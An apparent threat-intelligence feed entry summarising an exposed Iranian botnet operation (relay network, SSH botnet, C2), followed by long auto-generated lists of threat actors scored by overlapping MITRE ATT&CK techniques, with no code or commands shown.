Trusted Design

Iranian Botnet Exposed via Open Directory: 15-Node Relay Network and Active C2

概要

An Iranian threat actor's operational infrastructure was exposed through an open directory, revealing a 15-node relay network spanning Finland and Iran, an SSH-based botnet framework, and an active command and control server. The exposed bash history documented the full operation, including tunnel deployment, DDoS tooling development, and botnet creation. The actor used on-host compilation to evade detection and leveraged a Python script for mass SSH deployment. The botnet client, compiled and renamed 'hex' on infected hosts, showed automatic reconnection capabilities. This operation appears to be financially or personally motivated rather than state-directed, with infrastructure dual-purposed for censorship bypass and attack operations.

Created: 2026-03-17

Indicators

類似Pulses

類似するPulseは見つかりませんでした。

このPulseに関連する脅威アクター (事実ベース)

HAFNIUM

Score: 40.66
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1590.005 - IP Addresses
  • T1016.001 - Internet Connection Discovery
  • T1583.005 - Botnet
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1593.003 - Code Repositories
  • T1592.004 - Client Configurations
  • T1083 - File and Directory Discovery
  • T1584.005 - Botnet
  • T1583.006 - Web Services
  • T1068 - Exploitation for Privilege Escalation
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1003.003 - NTDS
MITREへのリンク →

menuPass

Score: 30.69
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1003.002 - Security Account Manager
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1210 - Exploitation of Remote Services
  • T1039 - Data from Network Shared Drive
  • T1078 - Valid Accounts
  • T1036.003 - Rename Legitimate Utilities
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS
MITREへのリンク →

Wizard Spider

Score: 34.28
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1003.002 - Security Account Manager
  • T1005 - Data from Local System
  • T1518.002 - Backup Software Discovery
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1210 - Exploitation of Remote Services
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1570 - Lateral Tool Transfer
  • T1555.004 - Windows Credential Manager
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1003.003 - NTDS
  • T1204.001 - Malicious Link
MITREへのリンク →

APT33

Score: 12.19
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1040 - Network Sniffing
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
MITREへのリンク →

Fox Kitten

Score: 34.11
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1505.003 - Web Shell
  • T1546.008 - Accessibility Features
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1210 - Exploitation of Remote Services
  • T1039 - Data from Network Shared Drive
  • T1078 - Valid Accounts
  • T1585 - Establish Accounts
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS
MITREへのリンク →

CopyKittens

Score: 3.93
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1090 - Proxy
MITREへのリンク →

Volt Typhoon

Score: 72.20
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1016.001 - Internet Connection Discovery
  • T1584.008 - Network Devices
  • T1007 - System Service Discovery
  • T1590.004 - Network Topology
  • T1070.007 - Clear Network Connection History and Configurations
  • T1584.003 - Virtual Private Server
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1589 - Gather Victim Identity Information
  • T1505.003 - Web Shell
  • T1590.006 - Network Security Appliances
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1584.005 - Botnet
  • T1090.003 - Multi-hop Proxy
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1570 - Lateral Tool Transfer
  • T1584.004 - Server
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1518 - Software Discovery
  • T1596.005 - Scan Databases
  • T1003.003 - NTDS
  • T1090.001 - Internal Proxy
MITREへのリンク →

APT1

Score: 12.61
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1114.001 - Local Email Collection
  • T1007 - System Service Discovery
  • T1005 - Data from Local System
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
MITREへのリンク →

Mustang Panda

Score: 51.31
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1587.001 - Malware
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1205 - Traffic Signaling
  • T1572 - Protocol Tunneling
  • T1505.003 - Web Shell
  • T1585.002 - Email Accounts
  • T1176.002 - IDE Extensions
  • T1016 - System Network Configuration Discovery
  • T1219.001 - IDE Tunneling
  • T1083 - File and Directory Discovery
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1052.001 - Exfiltration over USB
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1518 - Software Discovery
  • T1003.003 - NTDS
  • T1204.001 - Malicious Link
MITREへのリンク →

Play

Score: 16.82
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1587.001 - Malware
  • T1190 - Exploit Public-Facing Application
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1048 - Exfiltration Over Alternative Protocol
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1018 - Remote System Discovery
MITREへのリンク →

Chimera

Score: 32.59
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1071.004 - DNS
  • T1114.001 - Local Email Collection
  • T1007 - System Service Discovery
  • T1572 - Protocol Tunneling
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1039 - Data from Network Shared Drive
  • T1078 - Valid Accounts
  • T1570 - Lateral Tool Transfer
  • T1111 - Multi-Factor Authentication Interception
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS
MITREへのリンク →

Sea Turtle

Score: 31.39
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1583 - Acquire Infrastructure
  • T1583.002 - DNS Server
  • T1114.001 - Local Email Collection
  • T1213.006 - Databases
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1078 - Valid Accounts
  • T1203 - Exploitation for Client Execution
  • T1608.003 - Install Digital Certificate
  • T1584.002 - DNS Server
  • T1071.001 - Web Protocols
MITREへのリンク →

APT39

Score: 27.61
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1071.004 - DNS
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1090.002 - External Proxy
  • T1083 - File and Directory Discovery
  • T1078 - Valid Accounts
  • T1102.002 - Bidirectional Communication
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1204.001 - Malicious Link
  • T1090.001 - Internal Proxy
MITREへのリンク →

RedCurl

Score: 17.07
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1114.001 - Local Email Collection
  • T1587.001 - Malware
  • T1005 - Data from Local System
  • T1083 - File and Directory Discovery
  • T1039 - Data from Network Shared Drive
  • T1071.001 - Web Protocols
  • T1046 - Network Service Discovery
  • T1204.001 - Malicious Link
MITREへのリンク →

APT5

Score: 18.63
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1003.002 - Security Account Manager
  • T1583.005 - Botnet
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1083 - File and Directory Discovery
  • T1554 - Compromise Host Software Binary
MITREへのリンク →

Agrius

Score: 19.24
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1583 - Acquire Infrastructure
  • T1003.002 - Security Account Manager
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1562.001 - Disable or Modify Tools
  • T1570 - Lateral Tool Transfer
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
MITREへのリンク →

GALLIUM

Score: 24.86
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1003.002 - Security Account Manager
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1505.003 - Web Shell
  • T1583.004 - Server
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1078 - Valid Accounts
  • T1036.003 - Rename Legitimate Utilities
  • T1570 - Lateral Tool Transfer
  • T1018 - Remote System Discovery
MITREへのリンク →

APT41

Score: 61.84
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1568.002 - Domain Generation Algorithms
  • T1003.002 - Security Account Manager
  • T1071.004 - DNS
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1016 - System Network Configuration Discovery
  • T1546.008 - Accessibility Features
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1104 - Multi-Stage Channels
  • T1071.002 - File Transfer Protocols
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1203 - Exploitation for Client Execution
  • T1570 - Lateral Tool Transfer
  • T1213.003 - Code Repositories
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1596.005 - Scan Databases
  • T1003.003 - NTDS
  • T1102.001 - Dead Drop Resolver
MITREへのリンク →

MuddyWater

Score: 41.54
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
  • T1218.003 - CMSTP
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1137.001 - Office Template Macros
  • T1083 - File and Directory Discovery
  • T1218.005 - Mshta
  • T1104 - Multi-Stage Channels
  • T1583.006 - Web Services
  • T1210 - Exploitation of Remote Services
  • T1562.001 - Disable or Modify Tools
  • T1102.002 - Bidirectional Communication
  • T1203 - Exploitation for Client Execution
  • T1071.001 - Web Protocols
  • T1518 - Software Discovery
  • T1204.001 - Malicious Link
MITREへのリンク →

APT28

Score: 68.91
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1584.008 - Network Devices
  • T1598.003 - Spearphishing Link
  • T1040 - Network Sniffing
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1071.003 - Mail Protocols
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1092 - Communication Through Removable Media
  • T1090.002 - External Proxy
  • T1083 - File and Directory Discovery
  • T1583.006 - Web Services
  • T1210 - Exploitation of Remote Services
  • T1090.003 - Multi-hop Proxy
  • T1039 - Data from Network Shared Drive
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1102.002 - Bidirectional Communication
  • T1203 - Exploitation for Client Execution
  • T1598 - Phishing for Information
  • T1189 - Drive-by Compromise
  • T1498 - Network Denial of Service
  • T1071.001 - Web Protocols
  • T1003.003 - NTDS
  • T1204.001 - Malicious Link
  • T1001.001 - Junk Data
MITREへのリンク →

Turla

Score: 55.95
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1016.001 - Internet Connection Discovery
  • T1587.001 - Malware
  • T1213.006 - Databases
  • T1007 - System Service Discovery
  • T1584.003 - Virtual Private Server
  • T1005 - Data from Local System
  • T1071.003 - Mail Protocols
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1583.006 - Web Services
  • T1562.001 - Disable or Modify Tools
  • T1584.006 - Web Services
  • T1068 - Exploitation for Privilege Escalation
  • T1102.002 - Bidirectional Communication
  • T1570 - Lateral Tool Transfer
  • T1555.004 - Windows Credential Manager
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1584.004 - Server
  • T1018 - Remote System Discovery
  • T1204.001 - Malicious Link
  • T1090.001 - Internal Proxy
MITREへのリンク →

Sowbug

Score: 7.86
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1083 - File and Directory Discovery
  • T1039 - Data from Network Shared Drive
MITREへのリンク →

BRONZE BUTLER

Score: 23.71
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1007 - System Service Discovery
  • T1005 - Data from Local System
  • T1083 - File and Directory Discovery
  • T1562.001 - Disable or Modify Tools
  • T1039 - Data from Network Shared Drive
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1518 - Software Discovery
  • T1102.001 - Dead Drop Resolver
MITREへのリンク →

UNC3886

Score: 43.35
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1587.001 - Malware
  • T1040 - Network Sniffing
  • T1070.007 - Clear Network Connection History and Configurations
  • T1190 - Exploit Public-Facing Application
  • T1205 - Traffic Signaling
  • T1562.004 - Disable or Modify System Firewall
  • T1681 - Search Threat Vendor Data
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1205.001 - Port Knocking
  • T1554 - Compromise Host Software Binary
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1203 - Exploitation for Client Execution
  • T1570 - Lateral Tool Transfer
MITREへのリンク →

Kimsuky

Score: 83.34
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1583 - Acquire Infrastructure
  • T1056.001 - Keylogging
  • T1587.001 - Malware
  • T1598.003 - Spearphishing Link
  • T1007 - System Service Discovery
  • T1040 - Network Sniffing
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1205 - Traffic Signaling
  • T1562.004 - Disable or Modify System Firewall
  • T1071.003 - Mail Protocols
  • T1505.003 - Web Shell
  • T1583.004 - Server
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1071.002 - File Transfer Protocols
  • T1534 - Internal Spearphishing
  • T1562.001 - Disable or Modify Tools
  • T1593.001 - Social Media
  • T1102.002 - Bidirectional Communication
  • T1598 - Phishing for Information
  • T1585 - Establish Accounts
  • T1111 - Multi-Factor Authentication Interception
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
  • T1588.005 - Exploits
  • T1102.001 - Dead Drop Resolver
MITREへのリンク →

APT3

Score: 21.79
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1005 - Data from Local System
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1546.008 - Accessibility Features
  • T1083 - File and Directory Discovery
  • T1104 - Multi-Stage Channels
  • T1203 - Exploitation for Client Execution
  • T1018 - Remote System Discovery
  • T1204.001 - Malicious Link
MITREへのリンク →

FIN8

Score: 14.29
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1016.001 - Internet Connection Discovery
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1486 - Data Encrypted for Impact
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1204.001 - Malicious Link
MITREへのリンク →

Ke3chang

Score: 29.51
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1003.002 - Security Account Manager
  • T1071.004 - DNS
  • T1587.001 - Malware
  • T1583.005 - Botnet
  • T1007 - System Service Discovery
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1078 - Valid Accounts
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1003.003 - NTDS
MITREへのリンク →

Lotus Blossom

Score: 19.94
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1016.001 - Internet Connection Discovery
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1090.003 - Multi-hop Proxy
  • T1134 - Access Token Manipulation
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1090.001 - Internal Proxy
MITREへのリンク →

FIN13

Score: 46.70
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1016.001 - Internet Connection Discovery
  • T1003.002 - Security Account Manager
  • T1587.001 - Malware
  • T1590.004 - Network Topology
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1589 - Gather Victim Identity Information
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1134.003 - Make and Impersonate Token
  • T1071.001 - Web Protocols
  • T1046 - Network Service Discovery
  • T1003.003 - NTDS
  • T1556 - Modify Authentication Process
  • T1090.001 - Internal Proxy
MITREへのリンク →

Earth Lusca

Score: 35.47
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1007 - System Service Discovery
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1583.004 - Server
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1210 - Exploitation of Remote Services
  • T1584.006 - Web Services
  • T1189 - Drive-by Compromise
  • T1584.004 - Server
  • T1018 - Remote System Discovery
  • T1204.001 - Malicious Link
MITREへのリンク →

Magic Hound

Score: 80.93
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1056.001 - Keylogging
  • T1590.005 - IP Addresses
  • T1016.001 - Internet Connection Discovery
  • T1114.001 - Local Email Collection
  • T1598.003 - Spearphishing Link
  • T1071 - Application Layer Protocol
  • T1005 - Data from Local System
  • T1562 - Impair Defenses
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1589 - Gather Victim Identity Information
  • T1562.004 - Disable or Modify System Firewall
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1583.006 - Web Services
  • T1562.001 - Disable or Modify Tools
  • T1486 - Data Encrypted for Impact
  • T1573 - Encrypted Channel
  • T1592.002 - Software
  • T1102.002 - Bidirectional Communication
  • T1570 - Lateral Tool Transfer
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1591.001 - Determine Physical Locations
  • T1204.001 - Malicious Link
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

Aquatic Panda

Score: 12.05
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1007 - System Service Discovery
  • T1005 - Data from Local System
  • T1595.002 - Vulnerability Scanning
  • T1036.004 - Masquerade Task or Service
  • T1562.001 - Disable or Modify Tools
MITREへのリンク →

INC Ransom

Score: 18.66
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1071 - Application Layer Protocol
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1570 - Lateral Tool Transfer
  • T1046 - Network Service Discovery
MITREへのリンク →

Akira

Score: 15.83
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1558 - Steal or Forge Kerberos Tickets
  • T1219 - Remote Access Tools
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1018 - Remote System Discovery
MITREへのリンク →

ToddyCat

Score: 12.22
Matched TTPs:
  • T1560.001 - Archive via Utility
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1083 - File and Directory Discovery
  • T1018 - Remote System Discovery
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

Ember Bear

Score: 48.33
Matched TTPs:
  • T1583 - Acquire Infrastructure
  • T1491.002 - External Defacement
  • T1003.002 - Security Account Manager
  • T1071.004 - DNS
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1572 - Protocol Tunneling
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1210 - Exploitation of Remote Services
  • T1090.003 - Multi-hop Proxy
  • T1562.001 - Disable or Modify Tools
  • T1203 - Exploitation for Client Execution
  • T1570 - Lateral Tool Transfer
  • T1585 - Establish Accounts
  • T1595.001 - Scanning IP Blocks
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1588.005 - Exploits
MITREへのリンク →

Indrik Spider

Score: 19.88
Matched TTPs:
  • T1583 - Acquire Infrastructure
  • T1587.001 - Malware
  • T1007 - System Service Discovery
  • T1585.002 - Email Accounts
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1584.004 - Server
  • T1018 - Remote System Discovery
MITREへのリンク →

Contagious Interview

Score: 51.27
Matched TTPs:
  • T1583 - Acquire Infrastructure
  • T1588.007 - Artificial Intelligence
  • T1587.001 - Malware
  • T1608.001 - Upload Malware
  • T1589 - Gather Victim Identity Information
  • T1071.003 - Mail Protocols
  • T1681 - Search Threat Vendor Data
  • T1585.002 - Email Accounts
  • T1593.003 - Code Repositories
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1583.006 - Web Services
  • T1562.001 - Disable or Modify Tools
  • T1546.004 - Unix Shell Configuration Modification
  • T1593.001 - Social Media
  • T1585 - Establish Accounts
  • T1204.001 - Malicious Link
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

Sandworm Team

Score: 76.37
Matched TTPs:
  • T1583 - Acquire Infrastructure
  • T1056.001 - Keylogging
  • T1491.002 - External Defacement
  • T1587.001 - Malware
  • T1213.006 - Databases
  • T1598.003 - Spearphishing Link
  • T1040 - Network Sniffing
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1219 - Remote Access Tools
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1583.004 - Server
  • T1585.002 - Email Accounts
  • T1591.002 - Business Relationships
  • T1090 - Proxy
  • T1083 - File and Directory Discovery
  • T1584.005 - Botnet
  • T1078 - Valid Accounts
  • T1486 - Data Encrypted for Impact
  • T1592.002 - Software
  • T1102.002 - Bidirectional Communication
  • T1203 - Exploitation for Client Execution
  • T1570 - Lateral Tool Transfer
  • T1499 - Endpoint Denial of Service
  • T1071.001 - Web Protocols
  • T1584.004 - Server
  • T1018 - Remote System Discovery
  • T1003.003 - NTDS
  • T1204.001 - Malicious Link
MITREへのリンク →

Star Blizzard

Score: 17.73
Matched TTPs:
  • T1583 - Acquire Infrastructure
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1589 - Gather Victim Identity Information
  • T1585.002 - Email Accounts
  • T1598.002 - Spearphishing Attachment
  • T1078 - Valid Accounts
MITREへのリンク →

APT38

Score: 22.86
Matched TTPs:
  • T1056.001 - Keylogging
  • T1005 - Data from Local System
  • T1562.004 - Disable or Modify System Firewall
  • T1505.003 - Web Shell
  • T1083 - File and Directory Discovery
  • T1218.005 - Mshta
  • T1562.001 - Disable or Modify Tools
  • T1486 - Data Encrypted for Impact
  • T1036.003 - Rename Legitimate Utilities
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
MITREへのリンク →

Ajax Security Team

Score: 4.46
Matched TTPs:
  • T1056.001 - Keylogging
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

Darkhotel

Score: 7.96
Matched TTPs:
  • T1056.001 - Keylogging
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
MITREへのリンク →

Tonto Team

Score: 12.78
Matched TTPs:
  • T1056.001 - Keylogging
  • T1505.003 - Web Shell
  • T1090.002 - External Proxy
  • T1210 - Exploitation of Remote Services
  • T1068 - Exploitation for Privilege Escalation
  • T1203 - Exploitation for Client Execution
MITREへのリンク →

Threat Group-3390

Score: 30.81
Matched TTPs:
  • T1056.001 - Keylogging
  • T1003.002 - Security Account Manager
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1608.002 - Upload Tool
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1210 - Exploitation of Remote Services
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
MITREへのリンク →

Lazarus Group

Score: 49.09
Matched TTPs:
  • T1056.001 - Keylogging
  • T1587.001 - Malware
  • T1005 - Data from Local System
  • T1562.004 - Disable or Modify System Firewall
  • T1585.002 - Email Accounts
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1104 - Multi-Stage Channels
  • T1583.006 - Web Services
  • T1562.001 - Disable or Modify Tools
  • T1078 - Valid Accounts
  • T1036.003 - Rename Legitimate Utilities
  • T1102.002 - Bidirectional Communication
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1584.004 - Server
  • T1046 - Network Service Discovery
  • T1566.003 - Spearphishing via Service
  • T1090.001 - Internal Proxy
MITREへのリンク →

PLATINUM

Score: 5.80
Matched TTPs:
  • T1056.001 - Keylogging
  • T1068 - Exploitation for Privilege Escalation
  • T1189 - Drive-by Compromise
MITREへのリンク →

FIN4

Score: 8.65
Matched TTPs:
  • T1056.001 - Keylogging
  • T1090.003 - Multi-hop Proxy
  • T1078 - Valid Accounts
  • T1071.001 - Web Protocols
  • T1204.001 - Malicious Link
MITREへのリンク →

OilRig

Score: 38.88
Matched TTPs:
  • T1056.001 - Keylogging
  • T1071.004 - DNS
  • T1587.001 - Malware
  • T1007 - System Service Discovery
  • T1005 - Data from Local System
  • T1608.001 - Upload Malware
  • T1219 - Remote Access Tools
  • T1572 - Protocol Tunneling
  • T1562.004 - Disable or Modify System Firewall
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1078 - Valid Accounts
  • T1068 - Exploitation for Privilege Escalation
  • T1203 - Exploitation for Client Execution
  • T1555.004 - Windows Credential Manager
  • T1071.001 - Web Protocols
  • T1046 - Network Service Discovery
  • T1204.001 - Malicious Link
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

APT42

Score: 16.61
Matched TTPs:
  • T1056.001 - Keylogging
  • T1608.001 - Upload Malware
  • T1070.008 - Clear Mailbox Data
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1111 - Multi-Factor Authentication Interception
  • T1071.001 - Web Protocols
MITREへのリンク →

HEXANE

Score: 27.49
Matched TTPs:
  • T1056.001 - Keylogging
  • T1016.001 - Internet Connection Discovery
  • T1583.002 - DNS Server
  • T1608.001 - Upload Malware
  • T1589 - Gather Victim Identity Information
  • T1585.002 - Email Accounts
  • T1016 - System Network Configuration Discovery
  • T1534 - Internal Spearphishing
  • T1102.002 - Bidirectional Communication
  • T1018 - Remote System Discovery
  • T1518 - Software Discovery
MITREへのリンク →

APT32

Score: 40.29
Matched TTPs:
  • T1056.001 - Keylogging
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1589 - Gather Victim Identity Information
  • T1071.003 - Mail Protocols
  • T1505.003 - Web Shell
  • T1016 - System Network Configuration Discovery
  • T1083 - File and Directory Discovery
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1068 - Exploitation for Privilege Escalation
  • T1036.003 - Rename Legitimate Utilities
  • T1203 - Exploitation for Client Execution
  • T1570 - Lateral Tool Transfer
  • T1189 - Drive-by Compromise
  • T1071.001 - Web Protocols
  • T1018 - Remote System Discovery
  • T1046 - Network Service Discovery
  • T1204.001 - Malicious Link
MITREへのリンク →

Andariel

Score: 12.40
Matched TTPs:
  • T1590.005 - IP Addresses
  • T1005 - Data from Local System
  • T1592.002 - Software
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
MITREへのリンク →

TA551

Score: 7.66
Matched TTPs:
  • T1568.002 - Domain Generation Algorithms
  • T1218.005 - Mshta
  • T1071.001 - Web Protocols
MITREへのリンク →

APT29

Score: 60.70
Matched TTPs:
  • T1016.001 - Internet Connection Discovery
  • T1003.002 - Security Account Manager
  • T1587.001 - Malware
  • T1005 - Data from Local System
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1505.003 - Web Shell
  • T1090.002 - External Proxy
  • T1546.008 - Accessibility Features
  • T1568 - Dynamic Resolution
  • T1098.005 - Device Registration
  • T1218.005 - Mshta
  • T1021.007 - Cloud Services
  • T1583.006 - Web Services
  • T1090.003 - Multi-hop Proxy
  • T1078 - Valid Accounts
